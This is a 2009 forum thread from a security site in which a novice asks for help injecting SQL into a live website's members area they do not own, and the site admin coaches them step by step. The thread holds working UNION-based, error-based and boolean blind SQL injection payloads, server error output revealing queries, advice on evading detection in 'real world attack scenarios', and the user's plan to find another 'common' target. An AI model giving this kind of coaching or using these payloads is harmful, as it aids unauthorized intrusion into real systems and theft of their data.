|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
sql injection help please |
|
Posted: Thu Jun 04, 2009 3:25 pm |
|
|
RubberDoll |
Active user |
|
|
Joined: Jun 04, 2009 |
Posts: 46 |
|
|
|
|
|
|
|
Hello waraxe,
and thank you and others as knowledgable, for offering your help in so many cases. I've been reading topics here as a guest for a long time
sorry for picking stupid topic name, I'm a noob and I didn't know how to be more specific.
I'm pretty new to injections and I'm stuck with this error which I don't know how to move on.
I'm assuming the site is volunerable because it does reply with sql error, but no idea how to go from here..
id=20477+order+by+1--
no error, and the page displayed fine
id=20477+order+by+2--
Quote: |
MySQL error occured on line 380.
Error 1054: Unknown column '2' in 'order clause' |
I did discover tho, that when I tried
?id=20477+order+by+13--
the sql error changed
Quote: |
MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1054: Unknown column '13' in 'order clause'
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=20477 order by 13-- and aw_d1_gal_cat.extid=aw_gal_content.cid |
I also tried
id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12--
Quote: | Error 1222: The used SELECT statements have a different number of columns |
while ?id=null%20union%20all%20select%01,2,3,4,5,6,7,8,9,10,11,12,13--
results in the long syntax error as above
I assume 12 columns would be the correct guess, despite the error msg, but I don't know how to find the vulnerable column in this case, or is it even possible to go further with this
Thank you |
|
|
|
|
|
|
|
|
Posted: Thu Jun 04, 2009 7:55 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Affected parameter (id) is used in multiple different sql queries and they need different column count. Try this:
Code: |
id=-1+UNION+ALL+SELECT+12345--+
|
... and search for "12345" in response page html source.
If you can't get visual feedback, then next option is error-based feedback.
Try this:
Code: |
?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
|
Code: |
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
|
|
|
|
|
|
|
|
|
|
Posted: Fri Jun 05, 2009 3:53 am |
|
|
RubberDoll |
Active user |
|
|
Joined: Jun 04, 2009 |
Posts: 46 |
|
|
|
|
|
|
|
Thank you, waraxe
id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
blank page with:
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
Quote: |
MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1242: Subquery returns more than 1 row
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 OR IF(1,(SELECT 1 UNION ALL SELECT 1),0)-- and aw_d1_gal_cat.extid=aw_gal_content.cid |
btw, the site is an internet site and not on my machine, despite the local path shown in the error and is inside members area.. |
|
|
|
|
|
|
|
|
Posted: Fri Jun 05, 2009 8:41 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This means that you can use blind sql injection methods. Still, are you sure, that you don't have usable visual feedback?
Try:
Now Look at response page - do you see somewhere text as "12345"?
Another test:
Code: |
id=-1+UNION+ALL+SELECT+0x4142434445--+
|
And look for text "ABCDE".
By the way, for best results look at html source and search for those text markers from there too!
Now, if you tried this and did not get easy-to-use visual feedback, then you have to use blind injection methods. It means asking target server boolean questions and getting data back bit-by-bit. Blind injection manual exploitation is time consuming and error prone, so I would recommend automated tools or scripts for this. |
|
|
|
|
|
|
|
|
Posted: Sat Jun 06, 2009 9:50 am |
|
|
RubberDoll |
Active user |
|
|
Joined: Jun 04, 2009 |
Posts: 46 |
|
|
|
|
|
|
|
yep I'm completely sure I have no better visual feedback in the source
also there's no malformed page with these errors, only the error string displays by itself
id=12000%2b345
that's the source..
id=-1+UNION+ALL+SELECT+0x4142434445--+
source of reply:
Code: |
<b>MySQL</b> error occured on line <u>94</u> in file <u>c:\ZendProject/ZendProject_c/view-94.php.src</u>.<br><b>Error 1222:</b> <u>The used SELECT statements have a different number of columns</u><br><b>Query:</b> <u>SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 UNION ALL SELECT 0x4142434445-- and aw_d1_gal_cat.extid=aw_gal_content.cid</u> |
Could I ask if there's any automated tool to perform the bit by bit injection?
and what exactly would I need to do to make it manually? I might give it a try little by little if nothing else is possible
I also wanted to ask, with your permision, what was I 'telling' to the server in these strings from your earlier reply:
?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
lastly, I can PM you the login info and site url if you think that looking directly might help..
Thanks again |
|
|
|
|
|
|
|
|
Posted: Sat Jun 06, 2009 12:44 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Search Google for Blind Sql Injection tools:
http://www.google.ee/search?hl=et&q=blind+sql+injection+tool&btnG=Google+otsing&lr=&aq=f&oq=
Do you know c/c++/php/perl/python/ruby or other programming languages? If you do, then it's not hard to write your own exploit script/program.
Code: |
?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
|
Sql injection exploitation method above is based on indusing of sql errors.
Depending on boolean true or false, IF() construction will return two rows of ones or just zero. And in case of two rows you can see nice sql error message about subquery returning more than one row. In this way depending on server response attacker can differ between boolean true and false.
Example, which involves @@version:
Code: |
?id=-1+OR+IF(LENGTH(@@version)<1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
|
Same example with different error inducing method:
Code: |
?id=0%2bIF(LENGTH(@@version)<1,20477,0)
?id=0%2bIF(LENGTH(@@version)>0,20477,0)
|
Method above does not generate sql errors, which is generally good in the case of real world attack scenarios. |
|
|
|
|
|
|
|
|
Posted: Sun Jun 07, 2009 6:03 am |
|
|
RubberDoll |
Active user |
|
|
Joined: Jun 04, 2009 |
Posts: 46 |
|
|
|
|
|
|
|
Thank you waraxe, I did find a windows tool (Absinthe) that also supports login (since the vulnerable script is in members area) but it does not support mysql
Unfortunately, I have no knowledge of programing. nothing at all.
Perhaps I'm aiming too high trying this site, and I should move on and find a more "common" target.
Thanks for your time :) |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
|
|
Powered by phpBB � 2001-2008 phpBB Group
|
|
|
|
|